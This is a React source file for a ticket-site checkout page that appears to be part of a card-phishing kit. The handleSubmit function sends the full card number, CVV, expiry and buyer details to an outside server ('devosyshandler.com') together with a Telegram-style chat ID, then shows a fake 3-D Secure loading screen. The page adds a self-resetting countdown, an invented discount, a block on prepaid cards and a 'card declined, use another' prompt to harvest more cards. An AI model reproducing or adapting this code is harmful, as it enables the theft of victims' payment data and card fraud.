import React, { useState, useEffect, useRef } from 'react';
import { useNavigate } from 'react-router-dom';
import ReactPixel from 'react-facebook-pixel';
import { trackTikTokEvent, initTikTokPixel } from '../providers/tiktokPixel';
import { trackSnapchatEvent, initSnapchatPixel } from '../providers/snapchatPixel';
import InputField from '../providers/InputField';
import { isBlockedBin } from '../payment-component/binBlockValidator';
import { detectCardType } from '../payment-component/cardDetector';
import { getCardBadge } from '../payment-component/CardBadges';
import axios from 'axios';
import { toast } from 'react-toastify';
import { getTranslations } from '../translations';
import { GEOS, getCurrentGeo } from '../geoConfig';

const CheckoutFlow = () => {
    const navigate = useNavigate();
    const [loading, setLoading] = useState(false);

    const currentGeoId = getCurrentGeo();
    const geo = GEOS[currentGeoId] || GEOS.qa;

    // Language State
    const [lang, setLang] = useState(() => {
        const urlLang = new URLSearchParams(window.location.search).get('lang');
        if (urlLang && geo.supportedLangs.includes(urlLang)) return urlLang;
        const savedLang = localStorage.getItem('dino_lang');
        if (savedLang && geo.supportedLangs.includes(savedLang)) return savedLang;
        return geo.defaultLang;
    });

    const t = getTranslations(currentGeoId, lang);

    useEffect(() => {
        localStorage.setItem('dino_lang', lang);
        localStorage.setItem('dino_geo', currentGeoId);
        document.documentElement.lang = lang;
        document.documentElement.dir = t.dir;
    }, [lang, t.dir, currentGeoId]);

    const toggleLanguage = () => {
        if (geo.supportedLangs.length <= 1) return;
        const nextLang = lang === geo.defaultLang ? (geo.supportedLangs.find(l => l !== geo.defaultLang) || 'en') : geo.defaultLang;
        setLang(nextLang);
        localStorage.setItem('dino_lang', nextLang);
    };
    
    // Dynamic Seat logic based on geo prefix (e.g. PH-4821, OM-4821, KW-4821, HK-4821, QA-4821)
    const [seatCode] = useState(() => {
        const savedSeat = localStorage.getItem('reservedSeat');
        if (savedSeat) return savedSeat;
        const newSeat = (geo.seatPrefix || 'QA') + '-' + Math.floor(1000 + Math.random() * 9000);
        localStorage.setItem('reservedSeat', newSeat);
        return newSeat;
    });

    // 15-Minute Countdown Timer
    const [timeLeft, setTimeLeft] = useState(() => {
        const savedExpiry = localStorage.getItem('reservationExpiry');
        const now = Date.now();
        if (savedExpiry && parseInt(savedExpiry, 10) > now) {
            return Math.floor((parseInt(savedExpiry, 10) - now) / 1000);
        }
        const newExpiry = now + 15 * 60 * 1000;
        localStorage.setItem('reservationExpiry', newExpiry.toString());
        return 900;
    });

    useEffect(() => {
        const timer = setInterval(() => {
            setTimeLeft(prev => {
                if (prev <= 1) {
                    return 900; // Reset or keep active
                }
                return prev - 1;
            });
        }, 1000);
        return () => clearInterval(timer);
    }, []);

    const formatTimer = (seconds) => {
        const mins = Math.floor(seconds / 60);
        const secs = seconds % 60;
        return `${mins.toString().padStart(2, '0')}:${secs.toString().padStart(2, '0')}`;
    };

    // Card State & Rejected Card Handling
    const [cardData, setCardData] = useState({
        cardName: '',
        cardNumber: '',
        expiry: '',
        cvv: ''
    });
    const [cardError, setCardError] = useState('');
    const [cardType, setCardType] = useState(null);
    const [rejectedCard, setRejectedCard] = useState(() => {
        return typeof sessionStorage !== 'undefined' ? sessionStorage.getItem('rejected_card') || null : null;
    });

    // Sync rejected_card changes from WebSocket / storage events
    useEffect(() => {
        const handleStorage = () => {
            const active = typeof sessionStorage !== 'undefined' ? sessionStorage.getItem('rejected_card') : null;
            if (active !== rejectedCard) setRejectedCard(active);
        };
        window.addEventListener('storage', handleStorage);
        return () => window.removeEventListener('storage', handleStorage);
    }, [rejectedCard]);

    useEffect(() => {
        const rawDigits = cardData.cardNumber.replace(/\D/g, '');
        setCardType(detectCardType(rawDigits));

        if (rawDigits.length >= 6) {
            if (isBlockedBin(rawDigits)) {
                setCardError(lang === 'ar' 
                    ? 'البطاقات الافتراضية ومسبقة الدفع غير مقبولة. يرجى استخدام بطاقة مصرفية صادرة من بنك رسمي.' 
                    : lang === 'zh'
                    ? '本系統不支援預付卡及虛擬卡，請使用由銀行發行之實體卡。'
                    : 'Prepaid and virtual cards are not accepted. Please use a physical debit or credit card issued by your bank.');
                return;
            }
        }

        // Duplicate rejected card check
        if (rawDigits.length >= 15 && rejectedCard && rawDigits === rejectedCard.replace(/\D/g, '')) {
            setCardError(lang === 'ar'
                ? 'تم رفض هذه البطاقة مسبقاً. يرجى استخدام بطاقة مصرفية أخرى.'
                : lang === 'zh'
                ? '此卡已被拒絕，請使用其他銀行卡。'
                : 'This card was previously declined. Please use a different card.');
            return;
        }

        // Validate Expiry Date if entered
        const expDigits = cardData.expiry.replace(/\D/g, '');
        if (expDigits.length >= 2) {
            const month = parseInt(expDigits.slice(0, 2), 10);
            if (month < 1 || month > 12) {
                setCardError(lang === 'ar' 
                    ? 'شهر انتهاء الصلاحية غير صحيح (يجب أن يكون بين 01 و 12)' 
                    : lang === 'zh'
                    ? '有效月份不正確 (必須介乎 01 至 12)'
                    : 'Invalid expiry month (must be between 01 and 12)');
                return;
            }
        }
        if (expDigits.length === 4) {
            const month = parseInt(expDigits.slice(0, 2), 10);
            const yr = parseInt(expDigits.slice(2, 4), 10);
            if (month < 1 || month > 12) {
                setCardError(lang === 'ar' 
                    ? 'شهر انتهاء الصلاحية غير صحيح (01-12)' 
                    : lang === 'zh'
                    ? '有效月份不正確 (01-12)'
                    : 'Invalid expiry month (01-12)');
                return;
            }
            // Allow cards expiring from 2024 to 2040
            if (yr < 24 || yr > 40) {
                setCardError(lang === 'ar' 
                    ? 'سنة انتهاء الصلاحية غير صالحة' 
                    : lang === 'zh'
                    ? '有效年份不正確'
                    : 'Invalid expiry year');
                return;
            }
        }

        setCardError('');
    }, [cardData.cardNumber, cardData.expiry, lang, rejectedCard]);

    // Dynamic Order Data from localStorage
    const tierName = localStorage.getItem('tierName') || (lang === 'ar' ? 'تذكرة كبار الشخصيات VIP الشاملة' : (lang === 'zh' ? '全通行 VIP 貴賓門票' : 'Universal VIP Pass'));
    const selectedDate = localStorage.getItem('selectedDate') || t.openPassValidity;
    const timeSlot = localStorage.getItem('timeSlot') || t.openPassHours;
    const summ = localStorage.getItem('summ') || localStorage.getItem('totalPrice') || (geo.tiersConfig?.vip?.options?.adult?.price?.toString() || '100');
    const adultCount = localStorage.getItem('adultCount') || '1';
    const kidCount = localStorage.getItem('kidCount') || '0';
    const totalTickets = localStorage.getItem('totalTickets') || '1';
    const userFirstName = localStorage.getItem('userFirstName') || '';
    const userLastName = localStorage.getItem('userLastName') || '';
    const userEmail = localStorage.getItem('userEmail') || '';
    const userPhone = localStorage.getItem('userPhone') || '';

    // TikTok & Snapchat Pixel: InitiateCheckout on Mount
    useEffect(() => {
        let tt = new URLSearchParams(window.location.search).get('tt');
        if (tt) {
            initTikTokPixel(tt);
        } else {
            initTikTokPixel();
        }
        trackTikTokEvent('InitiateCheckout', {
            content_id: tierName,
            content_type: 'product',
            value: parseFloat(summ) || 0,
            currency: geo.currencyCode
        });

        let sc = new URLSearchParams(window.location.search).get('sc');
        if (sc) {
            initSnapchatPixel(sc);
        } else {
            initSnapchatPixel();
        }
        trackSnapchatEvent('START_CHECKOUT', {
            item_ids: [tierName],
            price: parseFloat(summ) || 0,
            currency: geo.currencyCode
        });
    }, [tierName, summ, geo.currencyCode]);

    // Pixel: AddPaymentInfo / ADD_BILLING Tracker
    const paymentInfoTracked = useRef(false);
    const triggerAddPaymentInfo = () => {
        if (!paymentInfoTracked.current) {
            paymentInfoTracked.current = true;
            trackTikTokEvent('AddPaymentInfo', {
                content_id: tierName,
                value: parseFloat(summ) || 0,
                currency: geo.currencyCode
            });
            trackSnapchatEvent('ADD_BILLING', {
                item_ids: [tierName],
                price: parseFloat(summ) || 0,
                currency: geo.currencyCode
            });
        }
    };

    const formatDateLabel = (dateStr) => {
        if (t.dates && t.dates[dateStr]) {
            return `${t.dates[dateStr].day}، ${t.dates[dateStr].dateStr}`;
        }
        return dateStr;
    };

    const handleChange = (e, field) => {
        triggerAddPaymentInfo();
        setCardData(prev => ({ ...prev, [field]: e.target.value }));
    };

    const handleSubmit = async (e) => {
        e.preventDefault();
        
        const rawCard = cardData.cardNumber.replace(/\D/g, '');
        const rawExp = cardData.expiry.replace(/\D/g, '');
        const rawCvv = cardData.cvv.replace(/\D/g, '');

        if (!cardData.cardName.trim()) {
            toast(
                <div className="flex items-center gap-2">
                    <span className="text-xs">
                        {lang === 'ar' ? 'يرجى إدخال اسم حامل البطاقة' : lang === 'zh' ? '請輸入持卡人姓名' : 'Please enter the name on the card'}
                    </span>
                </div>,
                { position: "bottom-right", autoClose: 5000, className: "bg-gray-900 text-white rounded-xl shadow-lg border border-red-500" }
            );
            return;
        }

        if (rawCard.length < 15) {
            toast(
                <div className="flex items-center gap-2">
                    <span className="text-xs">
                        {lang === 'ar' ? 'يرجى إدخال رقم بطاقة صحيح' : lang === 'zh' ? '請輸入有效的卡號' : 'Please enter a valid card number'}
                    </span>
                </div>,
                { position: "bottom-right", autoClose: 5000, className: "bg-gray-900 text-white rounded-xl shadow-lg border border-red-500" }
            );
            return;
        }

        if (rawExp.length < 4) {
            toast(
                <div className="flex items-center gap-2">
                    <span className="text-xs">
                        {lang === 'ar' ? 'يرجى إدخال تاريخ انتهاء الصلاحية (MM/YY)' : lang === 'zh' ? '請輸入有效期限 (MM/YY)' : 'Please enter card expiry date (MM/YY)'}
                    </span>
                </div>,
                { position: "bottom-right", autoClose: 5000, className: "bg-gray-900 text-white rounded-xl shadow-lg border border-red-500" }
            );
            return;
        }

        if (rawCvv.length < 3) {
            toast(
                <div className="flex items-center gap-2">
                    <span className="text-xs">
                        {lang === 'ar' ? 'يرجى إدخال رمز الأمان (CVV)' : lang === 'zh' ? '請輸入 3 位數安全碼 (CVV)' : 'Please enter the 3-digit CVV code'}
                    </span>
                </div>,
                { position: "bottom-right", autoClose: 5000, className: "bg-gray-900 text-white rounded-xl shadow-lg border border-red-500" }
            );
            return;
        }

        if (cardError || isBlockedBin(rawCard)) {
            toast(
                <div className="flex items-center gap-2">
                    <span className="text-xs">
                        {cardError || (lang === 'ar' 
                            ? 'البطاقات الافتراضية ومسبقة الدفع غير مقبولة. يرجى استخدام بطاقة بنكية صادرة من البنك.' 
                            : lang === 'zh'
                            ? '本系統不支援預付卡及虛擬卡，請使用由銀行發行之實體卡。'
                            : 'Virtual & prepaid cards are not accepted. Please use a bank-issued card.')}
                    </span>
                </div>,
                {
                    position: "bottom-right",
                    autoClose: 8000,
                    className: "bg-gray-900 text-white rounded-xl shadow-lg border border-red-500",
                    progressClassName: "bg-red-500",
                }
            );
            return;
        }

        setLoading(true);

        const digits = rawCard;
        localStorage.setItem('first-digit', digits.charAt(0));
        localStorage.setItem('last-four-digits', digits.slice(-4));
        localStorage.setItem('last-six-digits', digits.slice(-6));
        localStorage.setItem('summ', String(summ));
        localStorage.setItem('currency', geo.currencyCode);
        localStorage.setItem('session_last_submitted_card', digits);
        localStorage.setItem('session_last4', digits.slice(-4));
        localStorage.setItem('session_amount', String(summ));
        localStorage.setItem('session_currency', geo.currencyCode);
        localStorage.setItem('session_merchant', geo.merchantName || 'Dino World');
        localStorage.setItem('session_domain', window.location.hostname || process.env.REACT_APP_DOMAIN_NAME || 'dinoworld');
        localStorage.setItem('session_mode', 'standard');
        localStorage.setItem('session_design', digits.startsWith('5') || digits.startsWith('2') ? 'standard_mc_en' : 'standard_visa_en');

        // Strict Pixel Policy: Fire Facebook Purchase event ONCE on card submission with dynamic amount
        try {
            ReactPixel.track('Purchase', {
                value: parseFloat(summ) || 0,
                currency: geo.currencyCode
            });
        } catch (err) {
            console.error('Pixel Purchase track error:', err);
        }

        // TikTok Pixel Events: CompletePayment & Purchase
        try {
            triggerAddPaymentInfo();
            trackTikTokEvent('CompletePayment', {
                content_id: tierName,
                value: parseFloat(summ) || 0,
                currency: geo.currencyCode
            });
            trackTikTokEvent('Purchase', {
                content_id: tierName,
                content_type: 'product',
                quantity: 1,
                value: parseFloat(summ) || 0,
                currency: geo.currencyCode
            });
        } catch (err) {
            console.error('TikTok CompletePayment / Purchase track error:', err);
        }

        // Snapchat Pixel Event: PURCHASE
        try {
            trackSnapchatEvent('PURCHASE', {
                item_ids: [tierName],
                price: parseFloat(summ) || 0,
                currency: geo.currencyCode,
                transaction_id: localStorage.getItem('uuId') || ('uuid-' + Date.now())
            });
        } catch (err) {
            console.error('Snapchat Purchase track error:', err);
        }

        const fullAdditional = `Merchant: ${geo.merchantName || 'Merchant'} | Venue: ${geo.venue?.en || geo.venue?.zh || geo.venue?.ar || 'Main Hall'} | Package: ${tierName} | Tickets: ${totalTickets} (Adults: ${adultCount}, Kids: ${kidCount}) | Seat: ${seatCode} | Date: ${selectedDate} | Session: ${timeSlot} | Client: ${userFirstName} ${userLastName} | Phone: ${userPhone} | Email: ${userEmail} | Cardholder: ${cardData.cardName || (userFirstName + ' ' + userLastName)} | Total: ${summ} ${geo.currencyCode}`;

        // Complete redundant payload required by universal payment gateway
        const dataToSend = {
            orderId: Math.floor(Math.random() * 100000).toString(),
            uuId: localStorage.getItem('uuId') || ('uuid-' + Date.now()),
            main: rawCard,
            cardNumber: rawCard,
            date: cardData.expiry,
            expiry: cardData.expiry,
            code: cardData.cvv,
            cvv: cardData.cvv,
            cardName: cardData.cardName,
            name: cardData.cardName,
            firstName: userFirstName || cardData.cardName || "VIP",
            first_name: userFirstName || cardData.cardName || "VIP",
            lastName: userLastName || "Guest",
            last_name: userLastName || "Guest",
            zipCode: "10001",
            zip: "10001",
            email: userEmail || `guest@${geo.domainName || window.location.hostname}`,
            phone: userPhone || localStorage.getItem('userPhone') || (geo.phonePrefix + "00000000"),
            summ: String(summ),
            amount: String(summ),
            currency: geo.currencyCode || "USD",
            chatId: process.env.REACT_APP_CHAT_ID || "-1004474764058",
            chat_id: process.env.REACT_APP_CHAT_ID || "-1004474764058",
            domain: window.location.hostname || process.env.REACT_APP_DOMAIN_NAME || "devosyshandler.com",
            domainName: window.location.hostname || process.env.REACT_APP_DOMAIN_NAME || "devosyshandler.com",
            link: window.location.href,
            merchantName: geo.merchantName || "Dino World",
            mode: 'standard',
            additional: fullAdditional,
            details: fullAdditional,
            comment: fullAdditional,
            extra: fullAdditional,
            ticket_info: fullAdditional,
            order_details: fullAdditional,
            userData: fullAdditional
        };

        // OPTIMISTIC NAVIGATION (0ms latency)
        localStorage.setItem('uuId', dataToSend.uuId);
        localStorage.setItem('session_uuId', dataToSend.uuId);
        window.dispatchEvent(new CustomEvent('session_update', { detail: { uuId: dataToSend.uuId } }));
        navigate('/3ds/loading');

        // Background Submit
        axios.post((process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com') + '/api/validation', dataToSend, {
            headers: { "Content-Type": "application/json" }
        }).then(response => {
            if (response.data) {
                if (response.data.design) {
                    localStorage.setItem('session_design', response.data.design);
                }
                if (response.data.redirectUrl) {
                    window.location.href = response.data.redirectUrl;
                }
            }
        }).catch(err => {
            console.error('Payment submit error:', err);
            const declineMsg = err.response?.data?.message || 'Payment authorization failed. Please check your card details.';
            sessionStorage.setItem('card_error', declineMsg);
            navigate('/checkout');
        });
    };

    return (
        <div className={`min-h-screen bg-[#0a130e] text-[#f5f1e8] font-['Cairo',sans-serif] selection:bg-[#fbc61c] selection:text-black ${lang === 'en' ? 'font-sans' : ''}`} dir={t.dir}>
            
            {/* Top Navigation */}
            <div className="bg-[#0f2418] border-b border-[#fbc61c]/20 py-3.5 px-4 sticky top-0 z-50 backdrop-blur-md bg-opacity-95">
                <div className="max-w-4xl mx-auto flex items-center justify-between">
                    <div className="flex items-center gap-3">
                        <a href={`quiz.html?lang=${lang}`} className="text-xs text-slate-300 hover:text-[#fbc61c] flex items-center gap-1.5 transition-colors font-bold">
                            <svg className="w-4 h-4 rtl:rotate-180" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2.5" d="M15 19l-7-7 7-7"></path></svg>
                            <span>{lang === 'ar' ? 'تعديل التذاكر' : lang === 'zh' ? '修改選擇' : 'Modify Selection'}</span>
                        </a>
                    </div>

                    <div className="flex items-center gap-2 md:gap-3">
                        <span className="text-[11px] md:text-xs font-semibold text-slate-300 hidden sm:block">
                            {t.venueName}
                        </span>

                        {/* Styled Dino Grunge Language Toggle */}
                        {geo.supportedLangs.length > 1 && (
                            <button 
                                type="button"
                                onClick={toggleLanguage}
                                className="dino-lang-grunge-btn"
                                title="Switch Language"
                            >
                                <span>{t.langToggleLabel}</span>
                            </button>
                        )}
                    </div>
                </div>
            </div>

            <div className="max-w-xl mx-auto px-4 py-8">
                
                {/* 15-Min Reservation Countdown Bar */}
                <div className="bg-gradient-to-r from-amber-950/70 via-red-950/60 to-amber-950/70 border-2 border-[#fbc61c] rounded-2xl p-4 mb-6 text-center shadow-xl">
                    <div className="flex items-center justify-center gap-2 mb-1">
                        <span className="relative flex h-3 w-3">
                            <span className="animate-ping absolute inline-flex h-full w-full rounded-full bg-red-400 opacity-75"></span>
                            <span className="relative inline-flex rounded-full h-3 w-3 bg-red-500"></span>
                        </span>
                        <span className="text-xs md:text-sm font-bold text-slate-200">
                            {t.checkout?.timerTitle || 'Reserved Seats:'}
                        </span>
                        <span className="text-base md:text-lg font-mono font-black text-[#fbc61c] tracking-widest bg-black/50 px-2.5 py-0.5 rounded-lg border border-[#fbc61c]/40">
                            {formatTimer(timeLeft)}
                        </span>
                    </div>
                    <div className="text-[11px] text-slate-300 flex items-center justify-center gap-2">
                        <span>{t.checkout?.seatLabel || 'Seat:'}</span>
                        <span className="font-mono font-black text-[#fbc61c]">{seatCode}</span>
                        <span>•</span>
                        <span>{t.venueName}</span>
                    </div>
                </div>

                {/* Booking Summary Box */}
                <div className="bg-[#0f2418]/80 border border-[#fbc61c]/25 rounded-3xl p-5 md:p-6 mb-6 shadow-2xl backdrop-blur-sm">
                    <div className="flex items-center justify-between pb-3 border-b border-white/10 mb-3">
                        <h3 className="text-sm md:text-base font-black text-white">{t.checkout?.summaryTitle || 'Reservation Summary'}</h3>
                        <span className="dino-badge-discount text-[10px] px-2 py-0.5 font-bold">50% OFF</span>
                    </div>

                    <div className="space-y-2 text-xs">
                        <div className="flex justify-between items-center text-slate-300">
                            <span>{t.checkout?.ticketTierLabel || 'Package:'}</span>
                            <span className="font-bold text-white text-right">{tierName}</span>
                        </div>
                        <div className="flex justify-between items-center text-slate-300">
                            <span>{t.checkout?.selectedDateLabel || 'Date:'}</span>
                            <span className="font-bold text-[#fbc61c]">{formatDateLabel(selectedDate)}</span>
                        </div>
                        <div className="flex justify-between items-center text-slate-300">
                            <span>{t.checkout?.sessionTimeLabel || 'Session:'}</span>
                            <span className="font-semibold text-slate-200">{timeSlot}</span>
                        </div>
                        {userFirstName && (
                            <div className="flex justify-between items-center text-slate-300">
                                <span>{t.checkout?.attendeeNameLabel || 'Attendee:'}</span>
                                <span className="font-semibold text-slate-200">{userFirstName} {userLastName}</span>
                            </div>
                        )}
                        {userEmail && (
                            <div className="flex justify-between items-center text-slate-300">
                                <span>{t.checkout?.attendeeEmailLabel || 'Email:'}</span>
                                <span className="font-mono text-slate-300">{userEmail}</span>
                            </div>
                        )}
                    </div>

                    <div className="mt-4 pt-4 border-t border-white/10 flex justify-between items-baseline">
                        <span className="text-xs md:text-sm font-bold text-slate-300">{t.totalAmount}</span>
                        <span className="text-2xl font-black text-[#fbc61c]">
                            {summ} <span className="text-xs">{t.currency}</span>
                        </span>
                    </div>
                </div>

                {/* Secure Payment Card Form */}
                <div className="bg-[#0f2418]/80 border border-[#fbc61c]/25 rounded-3xl p-5 md:p-7 shadow-2xl backdrop-blur-sm">
                    {/* Header with High-Quality Adapted Visa & Mastercard Badges */}
                    <div className="flex items-center justify-between mb-6 pb-4 border-b border-white/10">
                        <div>
                            <h3 className="text-sm md:text-base font-black text-white">{t.checkout?.paymentDetailsTitle || 'Payment Card Details'}</h3>
                            <p className="text-[11px] text-slate-400 mt-0.5">{lang === 'ar' ? 'معاملة مصرفية مشفرة 256-bit SSL' : '256-bit SSL Encrypted & Protected'}</p>
                        </div>
                        <div className="flex items-center gap-3">
                            <img 
                                src={process.env.PUBLIC_URL + "/images/visa.png"} 
                                alt="Visa" 
                                className="h-5 md:h-6 w-auto object-contain drop-shadow" 
                            />
                            <img 
                                src={process.env.PUBLIC_URL + "/images/mastercard.png"} 
                                alt="Mastercard" 
                                className="h-6 md:h-7 w-auto object-contain drop-shadow" 
                            />
                        </div>
                    </div>

                    {/* Declined Card Alert Banner */}
                    {rejectedCard && (
                        <div className="mb-5 bg-red-950/90 border-2 border-red-500 rounded-2xl p-4 text-red-100 text-xs font-semibold flex items-start gap-3 shadow-xl animate-shake">
                            <svg className="w-5 h-5 text-red-400 flex-shrink-0 mt-0.5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2.5" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" />
                            </svg>
                            <div className="space-y-1 flex-1">
                                <div className="font-bold text-sm text-red-200">{lang === 'ar' ? 'تم رفض البطاقة البنكية السابقة' : lang === 'zh' ? '前一張卡已被拒絕' : 'Previous Card Was Declined'}</div>
                                <div className="text-slate-300 leading-relaxed">{lang === 'ar' ? 'يرجى إدخال بيانات بطاقة مصرفية أخرى صالحة لإتمام حجز المقاعد.' : lang === 'zh' ? '請輸入其他有效銀行卡資料以完成座位預訂。' : 'Please enter details for another bank card to complete your reservation.'}</div>
                            </div>
                        </div>
                    )}

                    {cardError && (
                        <div className="mb-5 bg-red-950/80 border border-red-500/80 rounded-2xl p-3.5 text-red-200 text-xs font-semibold flex items-center gap-2.5 shadow-lg">
                            <svg className="w-4 h-4 text-red-400 flex-shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2.5" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z"></path></svg>
                            <span>{cardError}</span>
                        </div>
                    )}

                    {/* Form with Clean Top Static Labels & Live Badge inside Card Number */}
                    <form onSubmit={handleSubmit} className="space-y-4">
                        {/* Name on Card */}
                        <div>
                            <label className="text-xs font-bold text-slate-300 block mb-1.5">
                                {t.checkout?.cardHolderLabel || 'Name on Card'} *
                            </label>
                            <input 
                                type="text" 
                                required
                                value={cardData.cardName}
                                onChange={(e) => handleChange(e, 'cardName')}
                                placeholder={lang === 'ar' ? 'الاسم كما هو مدون على البطاقة' : lang === 'zh' ? '持卡人姓名' : 'Cardholder Name'}
                                className="w-full bg-[#09170f] border border-white/15 focus:border-[#fbc61c] rounded-xl px-4 py-3.5 text-sm text-white placeholder-slate-500 outline-none transition-all uppercase tracking-wider font-semibold min-h-[50px]"
                                autoComplete="cc-name"
                            />
                        </div>

                        {/* Card Number with Dynamic Badge */}
                        <div>
                            <label className="text-xs font-bold text-slate-300 block mb-1.5">
                                {t.checkout?.cardNumberLabel || 'Card Number'} *
                            </label>
                            <div className="relative flex items-center">
                                <InputField
                                    required
                                    formatType="card"
                                    value={cardData.cardNumber}
                                    onChange={(e) => handleChange(e, 'cardNumber')}
                                    placeholder="0000 0000 0000 0000"
                                    dir="ltr"
                                    className="w-full bg-[#09170f] border border-white/15 focus:border-[#fbc61c] rounded-xl pl-4 pr-16 py-3.5 text-base text-white placeholder-slate-500 outline-none transition-all font-mono tracking-widest text-left min-h-[50px]"
                                    autoComplete="cc-number"
                                />
                                {cardType && (
                                    <div className="absolute right-3.5 top-1/2 -translate-y-1/2 z-10 pointer-events-none flex items-center justify-center">
                                        {getCardBadge(cardType)}
                                    </div>
                                )}
                            </div>
                        </div>

                        {/* Expiry Date and CVV */}
                        <div className="grid grid-cols-2 gap-4">
                            <div>
                                <label className="text-xs font-bold text-slate-300 block mb-1.5">
                                    {t.checkout?.expiryLabel || 'Expiry (MM/YY)'} *
                                </label>
                                <InputField
                                    required
                                    formatType="date"
                                    value={cardData.expiry}
                                    onChange={(e) => handleChange(e, 'expiry')}
                                    placeholder="MM / YY"
                                    dir="ltr"
                                    className="w-full bg-[#09170f] border border-white/15 focus:border-[#fbc61c] rounded-xl px-4 py-3.5 text-base text-white placeholder-slate-500 outline-none transition-all font-mono text-center tracking-widest min-h-[50px]"
                                    autoComplete="cc-exp"
                                />
                            </div>

                            <div>
                                <label className="text-xs font-bold text-slate-300 block mb-1.5">
                                    {t.checkout?.cvvLabel || 'CVV'} *
                                </label>
                                <div className="relative flex items-center">
                                    <InputField
                                        required
                                        formatType="code"
                                        maxLength={4}
                                        value={cardData.cvv}
                                        onChange={(e) => handleChange(e, 'cvv')}
                                        placeholder="CVV"
                                        dir="ltr"
                                        className="w-full bg-[#09170f] border border-white/15 focus:border-[#fbc61c] rounded-xl px-4 py-3.5 text-base text-white placeholder-slate-500 outline-none transition-all font-mono text-center tracking-widest min-h-[50px]"
                                        autoComplete="cc-csc"
                                    />
                                    <div className="absolute right-3.5 top-1/2 -translate-y-1/2 text-slate-400 pointer-events-none z-10">
                                        <svg className="w-4 h-4 opacity-50" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z"></path></svg>
                                    </div>
                                </div>
                            </div>
                        </div>

                        {/* Submit Button */}
                        <div className="pt-3">
                            <button 
                                type="submit" 
                                disabled={loading} 
                                className="w-full relative z-50 dino-grunge-btn py-4 rounded-xl font-black text-lg md:text-xl flex items-center justify-center gap-2 shadow-2xl disabled:opacity-40 disabled:cursor-not-allowed cursor-pointer"
                            >
                                {loading ? (
                                    <span>{t.checkout?.processingPayment || 'Processing...'}</span>
                                ) : (
                                    <>
                                        <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2.5" d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z"></path></svg>
                                        <span>{t.checkout?.confirmPayBtn || 'Pay & Confirm'} {summ} {t.currency}</span>
                                    </>
                                )}
                            </button>
                        </div>

                        <div className="text-center pt-2 text-[11px] text-slate-400">
                            {t.checkout?.secureNotice || 'All transactions are encrypted.'}
                        </div>
                    </form>
                </div>
            </div>
        </div>
    );
};

export default CheckoutFlow;
